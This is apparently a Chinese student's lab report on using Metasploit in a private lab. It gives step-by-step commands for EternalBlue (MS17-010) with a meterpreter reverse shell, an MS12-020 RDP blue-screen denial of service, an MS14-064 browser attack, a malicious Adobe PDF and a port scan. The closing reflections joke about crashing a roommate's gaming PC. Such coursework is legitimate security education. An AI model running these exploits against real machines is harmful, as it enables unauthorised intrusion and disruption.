实践内容(3.5分)

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1一个主动攻击实践(1分)

  • ms08_067; (失败)
  • MS17-010永恒之蓝(成功)
  • MS12-20(比永恒之蓝更蓝的蓝屏)(本来以为唯一后来不唯一了)

1.2 一个针对浏览器的攻击(1分)

  • ms14_064(成功)

1.3 一个针对客户端的攻击(1分)

  • Adobe(成功)

1.4 成功应用任何一个辅助模块。(0.5分)

  • 扫描查看靶机开放端口(唯一)

    以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。

实验过程

基础问题回答

(1)用自己的话解释什么是exploit,payload,encode.

任务一:一个主动攻击实践

漏洞MS08_067

关于漏洞MS08_067的原理

msfconsole进入msf控制台

search ms08_067查看该漏洞

use exploit/windows/smb/ms08_067_netapi使用该漏洞

show payloads回链攻击载荷



set LHOST 192.168.70.131 //攻击机的ip地址

set LPORT 5231 //攻击的端口

set RHOST 192.168.70.140 //靶机的ip地址

set target 0 //选择目标系统类型

exploit //进行攻击

关闭防火墙,改变安全策略,查看445端口状况,甚至改变winxp版本,由中文版改成英文版

很遗憾始终是只能检测出系统却无法生成有效的会话

ms17_010永恒之蓝

攻击方:kali 192.168.70.131

靶机:win7 192.168.70.130

输入msfconsole指令,打开控制台;

依次输入以下指令进行设置与攻击:



set payload windows/x64/meterpreter/reverse_tcp   //选择攻击载荷

set LHOST 192.168.70.131  //设置攻击方ip

set RHOST 192.168.70.130   //设置靶机ip

exploit

连接成功



尝试命令查看靶机ip

MS12-20

攻击机kali          192.168.70.131

靶机windows 7   192.168.70.130

用kali自带的的扫描工具nmap 查看靶机是否开启3389端口。(没开就把他打开!)

扫描之后发现3389是开放的,然后启动msfconsole, 利用里面的模块查看是否存在Ms12-020漏洞。



查询模块

set RHOST 192.168.70.130 //设置靶机地址

然后exploit



100%表示可以攻击

攻击模块

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids //加载攻击模块

set RHOST 192.168.70.130 //设置靶机地址

然后还是exploit



出现seems down说明靶机已经蓝上了!


一个针对浏览器的攻击

ms14_064

主机 kali 192.168.70.131

靶机 Windows XP SP3 192.168.70.141

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.70.131

set LPORT 2016

set URIPATH wyhy

然后exploit开启监听,然后生成网址,将这个网址在靶机打开后攻击机就捕获了靶机,建立会话

一个针对客户端的攻击

Adobe

攻击方:kali 192.168.70.131

靶机:winxp 192.168.70.141

输入msfconsole指令,打开控制台;

依次输入以下指令进行设置

set payload windows/meterpreter/reverse_tcp     //设置tcp反向连接

set LHOST 192.168.70.131//攻击方IP

set LPORT 5231    //攻击方攻击端口

set FILENAME wyhy_exp5.pdf

在终端中,将生成的文件按照文件路径复制出来,并复制到靶机中

在kali中重新打开,并输入以下指令进行监听:

use exploit/multi/handler //进入监听模块

set payload windows/meterpreter/reverse_tcp //设置tcp反向连接

set LHOST 192.168.70.131		 //攻击方IP

set LPORT 5231 //攻击方攻击端口

exploit //监听

辅助模块

查看靶机端口

使用auxiliary/scanner/portscan/tcp模块,用来扫描靶机的TCP端口使用情况;

执行命令use auxiliary/scanner/portscan/tcp进入并使用模块;

show options查看需要设置的参数信息,设置靶机的ip为RHOST

set PORT 1-5231

然后expolit

基础问题回答

  • 用自己的话解释什么是exploit,payload,encode.

    exploit:英文翻译为利用,黑客就是利用漏洞对电脑进行攻击,有漏洞不一定可以利用,但可以利用的一定有漏洞。

    payload:有效载荷。通常在传输数据时,为了使数据传输更可靠,要把原始数据分批传输,并且在每一批数据的头和尾都加上一定的辅助信息,而其中的原始数据就是payload

    encode:编码器,用来给payload进行编码,保护payload不被发现

离实战还缺些什么技术或步骤?

实战?首先我们只能在自己的局域网内实现。对于外网,不在同一子网下的地址锁定无法实现就无法实战攻击,我觉得这是目前最大缺憾。

实验感想

这次我最喜欢的就是那个蓝屏漏洞,在CSDN上逛到的以为我是独一无二结果……不过还是觉得那个很好玩,起初想做这个是想搞一下正在打Apex的室友让他感受一下快要吃鸡蓝个屏,但是系统版本高了没啥用。后续我会继续利用更新的漏洞让室友感受吃不到鸡的乐趣o( ̄▽ ̄)o

2018-2019 网络对抗技术 20165231 Exp5 MSF基础应用的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 一. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要 ...

  2. 2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化 ...

  3. 2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用 实践原理 1.MSF攻击方法 主动攻击:扫描主机漏洞,进行攻击 攻击浏览器 攻击其他客户端 2.MSF的六个模块 查看 ...

  4. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

    <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

  5. 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

  6. 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...

  7. 2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用 目录 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi: ...

  8. 20165214 2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 Week8

    <网络对抗技术>Exp5 MSF基础应用 Week8 一.实验目标与内容 1.实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体我 ...

  9. 2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用 exploit选取 主动攻击:ms17_010_eternalblue(唯一) 浏览器攻击:ms05_054_onlo ...

随机推荐

  1. 10-PI开发手册-ERP发布服务供外围系统调用(RFC类型)

      一.      文档信息 版本号* 更新日期* 姓名* 更新内容及更新理由* 备注* V1.0 2019/02/19 fanjb 文档创建 以福利接口13589(Z00HRJ_GJJ_REV_FI ...

  2. 关于Math.round()方法

    先上结论: 1.参数的小数点后第一位<5,运算结果为参数整数部分. 2.参数的小数点后第一位>5,运算结果为参数整数部分绝对值+1,符号(+ or -)不变. 3.参数的小数点后第一位=5 ...

  3. Android Studio自定义注释模板

    一.自定义新建文件时生成的注释 setting->Editor->File and Code Templates->Includes->File Header,在这里输入自定义 ...

  4. 关于map的初级应用

    map实际采用了红黑树的实现,在此,我们先不讨论map的底层实现结构原理,先来看看map究竟是怎么用,以及我是怎么看待map的. 先上代码: #include <map> #include ...

  5. RPM管理工具

    linux软件包从内容上可以分为binary code和source code(二进制包和源码包) binary code无需编译,可以直接使用 source code需要经过GCC,C++编译环境编 ...

  6. omit 配合antd from使用 hoistStatics

    import omit from 'omit.js'; // 作用: 从已经存在的对象中过滤特定属性 const formProps = omit(this.props, [ 'prefixCls', ...

  7. php函数 array_count_values

    (PHP 4, PHP 5, PHP 7) array_count_values — 统计数组中所有的值 array_count_values ( array $array ) : array arr ...

  8. ajax属性详解

    https://blog.csdn.net/mooncom/article/details/52402836 资料库: $.ajaxSetup()方法为将来的ajax请求设置默认值. http://w ...

  9. Activiti6-IdentityService(学习笔记)

    IdentityService并不依赖我们的流程部署文件,所以 直接放使用方法的测试代码了: public class IdentityServiceTest { private static fin ...

  10. springboot实现简单的文件上传

    承接上一篇,这里记录一下简单的springboot文件上传的方式 首先,springboot简单文件上传不需要添加额外的jar包和配置 这里贴一下后端controller层的实现代码 补一份前台的HT ...